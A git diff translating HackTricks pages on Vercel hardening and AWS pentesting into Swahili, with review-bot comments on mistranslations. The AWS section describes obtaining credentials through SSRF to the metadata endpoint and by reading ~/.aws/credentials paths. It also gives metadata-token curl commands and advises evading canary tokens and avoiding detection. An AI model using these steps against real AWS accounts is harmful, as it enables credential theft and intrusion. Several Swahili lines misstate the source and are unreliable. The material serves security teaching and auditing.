@@ -284,11 +284,11 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
#### Security Configurations:
- **Transfer**
- - **Misconfiguration:** Allows to transfer all the projects to another team
- - **Risk:** An attacker could steal the projects
+- **Misconfiguration:** Inaruhusu kuhamasisha miradi yote kwa timu nyingine
+- **Risk:** Mshambuliaji anaweza kuiba miradi
- **Delete Project**
- - **Misconfiguration:** Allows to delete the team with all the projects
- - **Risk:** Delete the projects
+- **Misconfiguration:** Inaruhusu kufuta timu na miradi yote
+- **Risk:** Futa miradi
---
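Review bot: `Inaruhusu kuhamasisha miradi yote kwa timu nyingine` again uses `kuhamasisha` ("to motivate") where "transfer" needs `kuhamisha`, the same slip as in the project-level Transfer item earlier in this file. The replaced lines also drop the indentation that made `**Misconfiguration:**` and `**Risk:**` children of `- **Transfer**` and `- **Delete Project**`; restore it so the two entries render as nested lists.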
@@ -297,8 +297,8 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
#### Security Configurations:
- **Speed Insights Cost Limit**
- - **Misconfiguration:** An attacker could increase this number
- - **Risk:** Increased costs
+- **Misconfiguration:** Mshambuliaji anaweza kuongeza nambari hii
+- **Risk:** Kuongezeka kwa gharama
---
@@ -307,25 +307,25 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
#### Security Configurations:
- **Add members**
- - **Misconfiguration:** An attacker could maintain persitence inviting an account he control
- - **Risk:** Attacker persistence
+- **Misconfiguration:** Mshambuliaji anaweza kudumisha kudumu kwa kumwalika akaunti anayoitawala
+- **Risk:** Kudumu kwa mshambuliaji
- **Roles**
- - **Misconfiguration:** Granting too many permissions to people that doesn't need it increases the risk of the vercel configuration. Check all the possible roles in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles)
- - **Risk**: Increate the exposure of the Vercel Team
+- **Misconfiguration:** Kutoa ruhusa nyingi kwa watu wasiohitaji huongeza hatari ya usanidi wa vercel. Angalia majukumu yote yanayowezekana katika [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles)
+- **Risk**: Kuongeza kufichuliwa kwa Vercel Team
---
### Access Groups
-An **Access Group** in Vercel is a collection of projects and team members with predefined role assignments, enabling centralized and streamlined access management across multiple projects.
+**Access Group** katika Vercel ni mkusanyiko wa miradi na wanachama wa timu wenye ugawaji wa majukumu yaliyowekwa, kuruhusu usimamizi wa ufikiaji wa kati na wa haraka kati ya miradi mingi.
**Potential Misconfigurations:**
-- **Over-Permissioning Members:** Assigning roles with more permissions than necessary, leading to unauthorized access or actions.
-- **Improper Role Assignments:** Incorrectly assigning roles that do not align with team members' responsibilities, causing privilege escalation.
-- **Lack of Project Segregation:** Failing to separate sensitive projects, allowing broader access than intended.
-- **Insufficient Group Management:** Not regularly reviewing or updating Access Groups, resulting in outdated or inappropriate access permissions.
-- **Inconsistent Role Definitions:** Using inconsistent or unclear role definitions across different Access Groups, leading to confusion and security gaps.
+- **Over-Permissioning Members:** Kuweka majukumu yenye ruhusa zaidi ya zinazohitajika, kupelekea ufikiaji au vitendo visivyoidhinishwa.
+- **Improper Role Assignments:** Kuweka vibaya majukumu ambavyo havikidhi majukumu ya wanachama wa timu, kupelekea kupanda kwa ruhusa.
+- **Lack of Project Segregation:** Kukosa kutenganisha miradi nyeti, kuruhusu ufikiaji mpana zaidi kuliko ilivyokusudiwa.
+- **Insufficient Group Management:** Kukosa kukagua au kuboresha Vikundi vya Ufikiaji mara kwa mara, kupelekea ruhusa za ufikiaji zisizofaa au za zamani.
+- **Inconsistent Role Definitions:** Kutumia ufafanuzi wa majukumu usio sawa au usio wazi kati ya Vikundi vya Ufikiaji tofauti, kupelekea mkanganyiko na mapengo ya usalama.
---
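Review bot: "kudumisha kudumu" and "Kudumu kwa mshambuliaji" are awkward renderings of persistence; since persistence is a term of art here, keeping "persistence" untranslated (as Log Drains and Git scopes are kept) is clearer. In the Access Groups bullets the term is translated as "Vikundi vya Ufikiaji" while the section heading and the first sentence of the same section keep "Access Group(s)" in English; pick one form.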
@@ -334,8 +334,8 @@ An **Access Group** in Vercel is a collection of projects and team members with
#### Security Configurations:
- **Log Drains to third parties:**
- - **Misconfiguration:** An attacker could configure a Log Drain to steal the logs
- - **Risk:** Partial persistence
+- **Misconfiguration:** Mshambuliaji anaweza kuunda Log Drain kuiba kumbukumbu
+- **Risk:** Kudumu kwa sehemu
---
@@ -343,99 +343,95 @@ An **Access Group** in Vercel is a collection of projects and team members with
#### Security Configurations:
-- **Team Email Domain:** When configured, this setting automatically invites Vercel Personal Accounts with email addresses ending in the specified domain (e.g., `mydomain.com`) to join your team upon signup and on the dashboard.
- - **Misconfiguration:**
- - Specifying the wrong email domain or a misspelled domain in the Team Email Domain setting.
- - Using a common email domain (e.g., `gmail.com`, `hotmail.com`) instead of a company-specific domain.
- - **Risks:**
- - **Unauthorized Access:** Users with email addresses from unintended domains may receive invitations to join your team.
- - **Data Exposure:** Potential exposure of sensitive project information to unauthorized individuals.
-- **Protected Git Scopes:** Allows you to add up to 5 Git scopes to your team to prevent other Vercel teams from deploying repositories from the protected scope. Multiple teams can specify the same scope, allowing both teams access.
- - **Misconfiguration:** Not adding critical Git scopes to the protected list.
+- **Team Email Domain:** Wakati umewekwa, mipangilio hii inawakaribisha moja kwa moja Akaunti za Kibinafsi za Vercel zenye anwani za barua pepe zinazomalizika na domain iliyotajwa (kwa mfano, `mydomain.com`) kujiunga na timu yako wakati wa kujiandikisha na kwenye dashibodi.
+- **Misconfiguration:**
+- Kuweka domain ya barua pepe isiyo sahihi au domain iliyoandikwa vibaya katika mipangilio ya Team Email Domain.
+- Kutumia domain ya barua pepe ya kawaida (kwa mfano, `gmail.com`, `hotmail.com`) badala ya domain maalum ya kampuni.
- **Risks:**
- - **Unauthorized Deployments:** Other teams may deploy repositories from your organization's Git scopes without authorization.
- - **Intellectual Property Exposure:** Proprietary code could be deployed and accessed outside your team.
-- **Environment Variable Policies:** Enforces policies for the creation and editing of the team's environment variables. Specifically, you can enforce that all environment variables are created as **Sensitive Environment Variables**, which can only be decrypted by Vercel's deployment system.
- - **Misconfiguration:** Keeping the enforcement of sensitive environment variables disabled.
- - **Risks:**
- - **Exposure of Secrets:** Environment variables may be viewed or edited by unauthorized team members.
- - **Data Breach:** Sensitive information like API keys and credentials could be leaked.
-- **Audit Log:** Provides an export of the team's activity for up to the last 90 days. Audit logs help in monitoring and tracking actions performed by team members.
- - **Misconfiguration:**\
- Granting access to audit logs to unauthorized team members.
- - **Risks:**
- - **Privacy Violations:** Exposure of sensitive user activities and data.
- - **Tampering with Logs:** Malicious actors could alter or delete logs to cover their tracks.
-- **SAML Single Sign-On:** Allows customization of SAML authentication and directory syncing for your team, enabling integration with an Identity Provider (IdP) for centralized authentication and user management.
- - **Misconfiguration:** An attacker could backdoor the Team setting up SAML parameters such as Entity ID, SSO URL, or certificate fingerprints.
- - **Risk:** Maintain persistence
-- **IP Address Visibility:** Controls whether IP addresses, which may be considered personal information under certain data protection laws, are displayed in Monitoring queries and Log Drains.
- - **Misconfiguration:** Leaving IP address visibility enabled without necessity.
- - **Risks:**
- - **Privacy Violations:** Non-compliance with data protection regulations like GDPR.
- - **Legal Repercussions:** Potential fines and penalties for mishandling personal data.
-- **IP Blocking:** Allows the configuration of IP addresses and CIDR ranges that Vercel should block requests from. Blocked requests do not contribute to your billing.
- - **Misconfiguration:** Could be abused by an attacker to allow malicious traffic or block legit traffic.
- - **Risks:**
- - **Service Denial to Legitimate Users:** Blocking access for valid users or partners.
- - **Operational Disruptions:** Loss of service availability for certain regions or clients.
+- **Unauthorized Access:** Watumiaji wenye anwani za barua pepe kutoka domain zisizokusudiwa wanaweza kupokea mialiko ya kujiunga na timu yako.
+- **Data Exposure:** Uwezekano wa kufichuliwa kwa taarifa nyeti za mradi kwa watu wasioidhinishwa.
+- **Protected Git Scopes:** Inaruhusu kuongeza hadi 5 Git scopes kwa timu yako ili kuzuia timu nyingine za Vercel kutekeleza repositories kutoka kwenye scope iliyo salama. Timu nyingi zinaweza kuweka scope sawa, kuruhusu timu zote kupata ufikiaji.
+- **Misconfiguration:** Kukosa kuongeza Git scopes muhimu kwenye orodha ya iliyo salama.
+- **Risks:**
+- **Unauthorized Deployments:** Timu nyingine zinaweza kutekeleza repositories kutoka kwenye Git scopes za shirika lako bila ruhusa.
+- **Intellectual Property Exposure:** Msimbo wa miliki unaweza kutekelezwa na kupatikana nje ya timu yako.
+- **Environment Variable Policies:** Inalazimisha sera za kuunda na kuhariri vigezo vya mazingira vya timu. Kwa haswa, unaweza kulazimisha kwamba vigezo vyote vya mazingira vimeundwa kama **Sensitive Environment Variables**, ambavyo vinaweza kufichuliwa tu na mfumo wa kutekeleza wa Vercel.
+- **Misconfiguration:** Kuacha kulazimisha vigezo vya mazingira nyeti kuwa kuzimwa.
+- **Risks:**
+- **Exposure of Secrets:** Vigezo vya mazingira vinaweza kuonyeshwa au kuhaririwa na wanachama wasioidhinishwa wa timu.
+- **Data Breach:** Taarifa nyeti kama funguo za API na akidi zinaweza kuvuja.
+- **Audit Log:** Inatoa usafirishaji wa shughuli za timu kwa hadi siku 90 zilizopita. Kumbukumbu za ukaguzi husaidia katika kufuatilia na kufuatilia vitendo vilivyofanywa na wanachama wa timu.
+- **Misconfiguration:**\
+Kutoa ufikiaji wa kumbukumbu za ukaguzi kwa wanachama wasioidhinishwa wa timu.
+- **Risks:**
+- **Privacy Violations:** Kuonyeshwa kwa shughuli na data nyeti za watumiaji.
+- **Tampering with Logs:** Watu wabaya wanaweza kubadilisha au kufuta kumbukumbu ili kuficha nyayo zao.
+- **SAML Single Sign-On:** Inaruhusu kubadilisha uthibitisho wa SAML na usawazishaji wa directory kwa timu yako, kuruhusu uunganisho na Mtoaji wa Kitambulisho (IdP) kwa uthibitisho wa kati na usimamizi wa watumiaji.
+- **Misconfiguration:** Mshambuliaji anaweza kuingiza milango ya nyuma kwenye mipangilio ya Timu akipanga vigezo vya SAML kama Entity ID, SSO URL, au alama za cheti.
+- **Risk:** Kudumisha kudumu
+- **IP Address Visibility:** Kudhibiti ikiwa anwani za IP, ambazo zinaweza kuzingatiwa kama taarifa binafsi chini ya sheria fulani za ulinzi wa data, zinaonyeshwa katika maswali ya Ufuatiliaji na Log Drains.
+- **Misconfiguration:** Kuacha kuonyesha anwani za IP bila sababu.
+- **Risks:**
+- **Privacy Violations:** Kukosa kufuata kanuni za ulinzi wa data kama GDPR.
+- **Legal Repercussions:** Uwezekano wa faini na adhabu kwa kushughulikia data binafsi vibaya.
+- **IP Blocking:** Inaruhusu mipangilio ya anwani za IP na anuwai za CIDR ambazo Vercel inapaswa kuzuia maombi kutoka. Maombi yaliyozuiwa hayachangii bili yako.
+- **Misconfiguration:** Inaweza kutumiwa vibaya na mshambuliaji kuruhusu trafiki ya uhalifu au kuzuia trafiki halali.
+- **Risks:**
+- **Service Denial to Legitimate Users:** Kuzuia ufikiaji kwa watumiaji halali au washirika.
+- **Operational Disruptions:** Kupoteza upatikanaji wa huduma kwa maeneo fulani au wateja.
---
### Secure Compute
-**Vercel Secure Compute** enables secure, private connections between Vercel Functions and backend environments (e.g., databases) by establishing isolated networks with dedicated IP addresses. This eliminates the need to expose backend services publicly, enhancing security, compliance, and privacy.
+**Vercel Secure Compute** inaruhusu uhusiano salama, wa faragha kati ya Vercel Functions na mazingira ya nyuma (kwa mfano, databases) kwa kuanzisha mitandao iliyotengwa yenye anwani za IP maalum. Hii inondoa haja ya kuonyesha huduma za nyuma hadharani, kuimarisha usalama, kufuata sheria, na faragha.
#### **Potential Misconfigurations and Risks**
1. **Incorrect AWS Region Selection**
- - **Misconfiguration:** Choosing an AWS region for the Secure Compute network that doesn't match the backend services' region.
- - **Risk:** Increased latency, potential data residency compliance issues, and degraded performance.
+- **Misconfiguration:** Kuchagua eneo la AWS kwa mtandao wa Secure Compute ambalo halifanani na eneo la huduma za nyuma.
+- **Risk:** Kuongezeka kwa ucheleweshaji, matatizo ya kufuata makazi ya data, na utendaji mbovu.
2. **Overlapping CIDR Blocks**
- - **Misconfiguration:** Selecting CIDR blocks that overlap with existing VPCs or other networks.
- - **Risk:** Network conflicts leading to failed connections, unauthorized access, or data leakage between networks.
+- **Misconfiguration:** Kuchagua blocks za CIDR zinazovutana na VPC zilizopo au mitandao mingine.
+- **Risk:** Migogoro ya mtandao inayopelekea kuunganishwa kwa kushindwa, ufikiaji usioidhinishwa, au kuvuja kwa data kati ya mitandao.
3. **Improper VPC Peering Configuration**
- - **Misconfiguration:** Incorrectly setting up VPC peering (e.g., wrong VPC IDs, incomplete route table updates).
- - **Risk:** Unauthorized access to backend infrastructure, failed secure connections, and potential data breaches.
+- **Misconfiguration:** Kuweka vibaya VPC peering (kwa mfano, IDs za VPC zisizo sahihi, masasisho yasiyokamilika ya jedwali la njia).
+- **Risk:** Ufikiaji usioidhinishwa wa miundombinu ya nyuma, kuunganishwa kwa salama kushindwa, na uwezekano wa uvunjaji wa data.
4. **Excessive Project Assignments**
- - **Misconfiguration:** Assigning multiple projects to a single Secure Compute network without proper isolation.
- - **Risk:** Shared IP exposure increases the attack surface, potentially allowing compromised projects to affect others.
+- **Misconfiguration:** Kuweka miradi mingi kwenye mtandao mmoja wa Secure Compute bila kutengwa ipasavyo.
+- **Risk:** Kuongezeka kwa kufichuliwa kwa IP kunaongeza uso wa shambulio, na kuweza kuruhusu miradi iliyoharibiwa kuathiri nyingine.
5. **Inadequate IP Address Management**
- - **Misconfiguration:** Failing to manage or rotate dedicated IP addresses appropriately.
- - **Risk:** IP spoofing, tracking vulnerabilities, and potential blacklisting if IPs are associated with malicious activities.
+- **Misconfiguration:** Kukosa kusimamia au kubadilisha anwani za IP maalum ipasavyo.
+- **Risk:** IP spoofing, udhaifu wa ufuatiliaji, na uwezekano wa kuorodheshwa kama mbaya ikiwa IP zitahusishwa na shughuli za uhalifu.
6. **Including Build Containers Unnecessarily**
- - **Misconfiguration:** Adding build containers to the Secure Compute network when backend access isn't required during builds.
- - **Risk:** Expanded attack surface, increased provisioning delays, and unnecessary consumption of network resources.
+- **Misconfiguration:** Kuongeza vyombo vya kujenga kwenye mtandao wa Secure Compute wakati ufikiaji wa nyuma hauhitajiki wakati wa kujenga.
+- **Risk:** Kuongezeka kwa uso wa shambulio, ucheleweshaji wa ugawaji, na matumizi yasiyo ya lazima ya rasilimali za mtandao.
7. **Failure to Securely Handle Bypass Secrets**
- - **Misconfiguration:** Exposing or mishandling secrets used to bypass deployment protections.
- - **Risk:** Unauthorized access to protected deployments, allowing attackers to manipulate or deploy malicious code.
+- **Misconfiguration:** Kuonyesha au kushughulikia vibaya siri zinazotumika kupita ulinzi wa kutekeleza.
+- **Risk:** Ufikiaji usioidhinishwa wa kutekeleza kulindwa, kuruhusu wavamizi kubadilisha au kutekeleza msimbo mbaya.
8. **Ignoring Region Failover Configurations**
- - **Misconfiguration:** Not setting up passive failover regions or misconfiguring failover settings.
- - **Risk:** Service downtime during primary region outages, leading to reduced availability and potential data inconsistency.
+- **Misconfiguration:** Kukosa kuweka maeneo ya failover yasiyo ya msingi au kuweka vibaya mipangilio ya failover.
+- **Risk:** Kukosekana kwa huduma wakati wa kutofaulu kwa eneo la msingi, kupelekea kupungua kwa upatikanaji na uwezekano wa kutokuelewana kwa data.
9. **Exceeding VPC Peering Connection Limits**
- - **Misconfiguration:** Attempting to establish more VPC peering connections than the allowed limit (e.g., exceeding 50 connections).
- - **Risk:** Inability to connect necessary backend services securely, causing deployment failures and operational disruptions.
+- **Misconfiguration:** Kujaribu kuanzisha uhusiano zaidi wa VPC peering kuliko kiwango kinachoruhusiwa (kwa mfano, kupita uhusiano 50).
+- **Risk:** Kukosa kuunganishwa kwa huduma muhimu za nyuma kwa usalama, kupelekea kushindwa kwa kutekeleza na usumbufu wa operesheni.
10. **Insecure Network Settings**
- - **Misconfiguration:** Weak firewall rules, lack of encryption, or improper network segmentation within the Secure Compute network.
- - **Risk:** Data interception, unauthorized access to backend services, and increased vulnerability to attacks.
+- **Misconfiguration:** Sheria dhaifu za moto, kukosa usimbuaji, au kutenganisha mtandao vibaya ndani ya mtandao wa Secure Compute.
+- **Risk:** Kukamatwa kwa data, ufikiaji usioidhinishwa wa huduma za nyuma, na kuongezeka kwa udhaifu wa mashambulizi.
---
### Environment Variables
-**Purpose:** Manage environment-specific variables and secrets used by all the projects.
+**Purpose:** Kusimamia vigezo maalum vya mazingira na siri zinazotumika na miradi yote.
#### Security Configurations:
- **Exposing Sensitive Variables**
- - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
- - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
+- **Misconfiguration:** Kuongeza alama ya `NEXT_PUBLIC_` kwa vigezo nyeti, na kuifanya ipatikane upande wa mteja.
+- **Risk:** Kuonyeshwa kwa funguo za API, akidi za database, au data nyingine nyeti kwa umma, kupelekea uvunjaji wa data.
- **Sensitive disabled**
- - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets.
- - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
+- **Misconfiguration:** Ikiwa imezimwa (kawaida) inawezekana kusoma thamani za siri zilizozalishwa.
+- **Risk:** Kuongezeka kwa uwezekano wa kufichuliwa kwa bahati mbaya au ufikiaji usioidhinishwa wa taarifa nyeti.
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
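Review bot: Three translations change the meaning of a security statement. On the Environment Variable Policies line, "vinaweza kufichuliwa tu na mfumo wa kutekeleza wa Vercel" says the sensitive variables can only be *exposed* by Vercel's deployment system, whereas the source says *decrypted*; "kufunguliwa" or "kusimbuliwa" avoids reusing the word this same list uses for "exposure". On the Insecure Network Settings line, "Sheria dhaifu za moto" literally means "weak fire rules" (firewall should stay "firewall"), and "kukosa usimbuaji" names decoding rather than encryption ("usimbaji fiche"). Minor: "kufuatilia na kufuatilia" on the Audit Log line uses one verb for both monitoring and tracking, and "kawaida" for default on the Sensitive disabled line differs from the "kwa default" used in the AWS README later in this diff.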
diff --git a/src/pentesting-cloud/aws-security/README.md b/src/pentesting-cloud/aws-security/README.md
index ad71de826..837cafd7d 100644
--- a/src/pentesting-cloud/aws-security/README.md
+++ b/src/pentesting-cloud/aws-security/README.md
@@ -4,9 +4,9 @@
## Basic Information
-**Before start pentesting** an **AWS** environment there are a few **basics things you need to know** about how AWS works to help you understand what you need to do, how to find misconfigurations and how to exploit them.
+**Kabla ya kuanza pentesting** mazingira ya **AWS**, kuna mambo machache **muhimu unahitaji kujua** kuhusu jinsi AWS inavyofanya kazi ili kukusaidia kuelewa unachohitaji kufanya, jinsi ya kupata makosa ya usanidi na jinsi ya kuyatumia.
-Concepts such as organization hierarchy, IAM and other basic concepts are explained in:
+Mifano kama vile hiyerarhya ya shirika, IAM na dhana nyingine za msingi zinaelezwa katika:
{{#ref}}
aws-basic-information/
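Review bot: "Mifano kama vile hiyerarhya ya shirika" renders "Concepts such as organization hierarchy" as "Examples such as ..." and misspells hierarchy; the same sentence already uses "dhana" for concepts, so "Dhana kama vile hierakia ya shirika" keeps it consistent.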
@@ -29,42 +29,42 @@ Tools to simulate attacks:
## AWS Pentester/Red Team Methodology
-In order to audit an AWS environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal AWS services an **external services** connected.
+Ili kukagua mazingira ya AWS, ni muhimu sana kujua: ni **huduma zipi zinatumika**, nini kinacho **onyeshwa**, nani ana **ufikiaji** wa nini, na jinsi huduma za ndani za AWS na **huduma za nje** zinavyounganishwa.
-From a Red Team point of view, the **first step to compromise an AWS environment** is to manage to obtain some **credentials**. Here you have some ideas on how to do that:
+Kutoka kwa mtazamo wa Red Team, **hatua ya kwanza ya kuathiri mazingira ya AWS** ni kufanikiwa kupata **akili**. Hapa kuna mawazo kadhaa juu ya jinsi ya kufanya hivyo:
-- **Leaks** in github (or similar) - OSINT
-- **Social** Engineering
-- **Password** reuse (password leaks)
-- Vulnerabilities in AWS-Hosted Applications
- - [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint
- - **Local File Read**
- - `/home/USERNAME/.aws/credentials`
- - `C:\Users\USERNAME\.aws\credentials`
-- 3rd parties **breached**
-- **Internal** Employee
+- **Mvuzi** katika github (au sawa) - OSINT
+- **Uhandisi** wa Kijamii
+- **Tena** ya nywila (mvuzi wa nywila)
+- Uhalifu katika Programu za AWS-Zilizohifadhiwa
+- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) yenye ufikiaji wa metadata endpoint
+- **Usomaji wa Faili za Mitaa**
+- `/home/USERNAME/.aws/credentials`
+- `C:\Users\USERNAME\.aws\credentials`
+- **Watu wa tatu** walio **vunjwa**
+- **Mfanyakazi** wa Ndani
- [**Cognito** ](aws-services/aws-cognito-enum/#cognito)credentials
-Or by **compromising an unauthenticated service** exposed:
+Au kwa **kuathiri huduma isiyo na uthibitisho** iliyonyeshwa:
{{#ref}}
aws-unauthenticated-enum-access/
{{#endref}}
-Or if you are doing a **review** you could just **ask for credentials** with these roles:
+Au ikiwa unafanya **kaguzi** unaweza tu **kuomba akili** na hizi nafasi:
{{#ref}}
aws-permissions-for-a-pentest.md
{{#endref}}
> [!NOTE]
-> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
+> Baada ya kufanikiwa kupata akili, unahitaji kujua **ni nani mwenye akili hizo**, na **nini wana ufikiaji wa**, hivyo unahitaji kufanya uainishaji wa msingi:
## Basic Enumeration
### SSRF
-If you found a SSRF in a machine inside AWS check this page for tricks:
+Ikiwa umepata SSRF katika mashine ndani ya AWS angalia ukurasa huu kwa mbinu:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
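Review bot: "akili" (used for credentials here and twice more in this hunk) means "mind/intelligence"; the Vercel file in this same diff uses "akidi", and that or the untranslated "credentials" should be used consistently. Other mistranslations in the initial-access list: "Mvuzi" is not a word for leak (leaks are "uvujaji"), "Tena ya nywila" does not say "password reuse" ("kutumia tena nywila"), and "Uhalifu" means crime rather than vulnerability ("udhaifu", which this file uses further down). The SSRF, Local File Read and credentials-path sub-items have also lost their nesting indent and now render as top-level bullets.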
@@ -72,8 +72,7 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou
### Whoami
-One of the first things you need to know is who you are (in where account you are in other info about the AWS env):
-
+Moja ya mambo ya kwanza unahitaji kujua ni wewe ni nani (katika akaunti gani ulipo na habari nyingine kuhusu mazingira ya AWS):
```bash
# Easiest way, but might be monitored?
aws sts get-caller-identity
@@ -89,10 +88,9 @@ aws sns publish --topic-arn arn:aws:sns:us-east-1:*account id*:aaa --message aaa
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document
```
-
> [!CAUTION]
-> Note that companies might use **canary tokens** to identify when **tokens are being stolen and used**. It's recommended to check if a token is a canary token or not before using it.\
-> For more info [**check this page**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass).
+> Kumbuka kwamba kampuni zinaweza kutumia **canary tokens** kubaini wakati **tokens zinapokuwa zikiibiwa na kutumika**. Inapendekezwa kuangalia kama token ni canary token au la kabla ya kuitumia.\
+> Kwa maelezo zaidi [**angalia ukurasa huu**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass).
### Org Enumeration
@@ -102,30 +100,30 @@ aws-services/aws-organizations-enum.md
### IAM Enumeration
-If you have enough permissions **checking the privileges of each entity inside the AWS account** will help you understand what you and other identities can do and how to **escalate privileges**.
+Ikiwa una ruhusa za kutosha **kuangalia haki za kila chombo ndani ya akaunti ya AWS** itakusaidia kuelewa ni nini unaweza kufanya na vitambulisho vingine na jinsi ya **kuinua haki**.
-If you don't have enough permissions to enumerate IAM, you can **steal bruteforce them** to figure them out.\
-Check **how to do the numeration and brute-forcing** in:
+Ikiwa huna ruhusa za kutosha kuhesabu IAM, unaweza **kuiba kuzitafutia** ili kujua.\
+Angalia **jinsi ya kufanya hesabu na brute-forcing** katika:
{{#ref}}
aws-services/aws-iam-enum.md
{{#endref}}
> [!NOTE]
-> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
-> In the following section you can check some ways to **enumerate some common services.**
+> Sasa kwamba **una taarifa fulani kuhusu hati zako** (na ikiwa wewe ni timu nyekundu matumaini huja **gundulika**). Ni wakati wa kubaini ni huduma zipi zinazotumika katika mazingira.\
+> Katika sehemu ifuatayo unaweza kuangalia njia kadhaa za **kuhesabu huduma za kawaida.**
## Services Enumeration, Post-Exploitation & Persistence
-AWS has an astonishing amount of services, in the following page you will find **basic information, enumeration** cheatsheets\*\*,\*\* how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them:
+AWS ina idadi kubwa ya huduma, katika ukurasa ufuatao utapata **taarifa za msingi, hesabu** cheatsheets\*\*,\*\* jinsi ya **kuepuka kugundulika**, kupata **kuendelea**, na hila nyingine za **post-exploitation** kuhusu baadhi yao:
{{#ref}}
aws-services/
{{#endref}}
-Note that you **don't** need to perform all the work **manually**, below in this post you can find a **section about** [**automatic tools**](./#automated-tools).
+Kumbuka kwamba **huhitaji** kufanya kazi yote **kwa mikono**, hapa chini katika chapisho hili unaweza kupata **sehemu kuhusu** [**zana za kiotomatiki**](./#automated-tools).
-Moreover, in this stage you might discovered **more services exposed to unauthenticated users,** you might be able to exploit them:
+Zaidi ya hayo, katika hatua hii unaweza kugundua **huduma zaidi zilizofichuliwa kwa watumiaji wasio na uthibitisho,** unaweza kuwa na uwezo wa kuzitumia:
{{#ref}}
aws-unauthenticated-enum-access/
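Review bot: The English source line "steal bruteforce them" is almost certainly a typo for "still bruteforce them", and the translation carries the typo through as "kuiba" (steal), turning a remark about enumeration into one about theft; "bado unaweza kuzi-bruteforce" is the intended sense. "matumaini huja gundulika" in the note is garbled ("inatumainiwa haujagunduliwa"), and persistence appears here as "kuendelea" while the Vercel file rendered it "kudumu"; pick one term. Since the cheatsheets line is being rewritten anyway, the stray `\*\*,\*\*` escape inherited from the source could be dropped.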
@@ -133,7 +131,7 @@ aws-unauthenticated-enum-access/
## Privilege Escalation
-If you can **check at least your own permissions** over different resources you could **check if you are able to obtain further permissions**. You should focus at least in the permissions indicated in:
+Ikiwa unaweza **kuangalia angalau ruhusa zako mwenyewe** juu ya rasilimali tofauti unaweza **kuangalia ikiwa unaweza kupata ruhusa zaidi**. Unapaswa kuzingatia angalau ruhusa zilizoonyeshwa katika:
{{#ref}}
aws-privilege-escalation/
@@ -141,10 +139,10 @@ aws-privilege-escalation/
## Publicly Exposed Services
-While enumerating AWS services you might have found some of them **exposing elements to the Internet** (VM/Containers ports, databases or queue services, snapshots or buckets...).\
-As pentester/red teamer you should always check if you can find **sensitive information / vulnerabilities** on them as they might provide you **further access into the AWS account**.
+Wakati wa kuhesabu huduma za AWS unaweza kuwa umepata baadhi yao **zinazoonyesha vitu kwenye Mtandao** (VM/Containers ports, databases au queue services, snapshots au buckets...).\
+Kama pentester/timu nyekundu unapaswa kila wakati kuangalia ikiwa unaweza kupata **taarifa nyeti / udhaifu** juu yao kwani zinaweza kukupa **ufikiaji zaidi kwenye akaunti ya AWS**.
-In this book you should find **information** about how to find **exposed AWS services and how to check them**. About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in:
+Katika kitabu hiki unapaswa kupata **taarifa** kuhusu jinsi ya kupata **huduma za AWS zilizofichuliwa na jinsi ya kuziangalia**. Kuhusu jinsi ya kupata **udhaifu katika huduma za mtandao zilizofichuliwa** ningependekeza **utafute** huduma maalum katika:
{{#ref}}
https://book.hacktricks.xyz/
@@ -154,52 +152,49 @@ https://book.hacktricks.xyz/
### From the root/management account
-When the management account creates new accounts in the organization, a **new role** is created in the new account, by default named **`OrganizationAccountAccessRole`** and giving **AdministratorAccess** policy to the **management account** to access the new account.
+Wakati akaunti ya usimamizi inaunda akaunti mpya katika shirika, **jukumu jipya** linaundwa katika akaunti mpya, kwa default inaitwa **`OrganizationAccountAccessRole`** na kutoa sera ya **AdministratorAccess** kwa **akaunti ya usimamizi** ili kufikia akaunti mpya.
-So, in order to access as administrator a child account you need:
+Hivyo, ili kufikia kama msimamizi akaunti ya mtoto unahitaji:
-- **Compromise** the **management** account and find the **ID** of the **children accounts** and the **names** of the **role** (OrganizationAccountAccessRole by default) allowing the management account to access as admin.
- - To find children accounts go to the organizations section in the aws console or run `aws organizations list-accounts`
- - You cannot find the name of the roles directly, so check all the custom IAM policies and search any allowing **`sts:AssumeRole` over the previously discovered children accounts**.
-- **Compromise** a **principal** in the management account with **`sts:AssumeRole` permission over the role in the children accounts** (even if the account is allowing anyone from the management account to impersonate, as its an external account, specific `sts:AssumeRole` permissions are necessary).
+- **Kuvunja** akaunti ya **usimamizi** na kupata **ID** ya **akaunti za watoto** na **majina** ya **jukumu** (OrganizationAccountAccessRole kwa default) inayoruhusu akaunti ya usimamizi kufikia kama msimamizi.
+- Ili kupata akaunti za watoto nenda kwenye sehemu ya mashirika katika console ya aws au endesha `aws organizations list-accounts`
+- Huwezi kupata jina la majukumu moja kwa moja, hivyo angalia sera zote za kawaida za IAM na tafuta yoyote inayoruhusu **`sts:AssumeRole` juu ya akaunti za watoto zilizogunduliwa awali**.
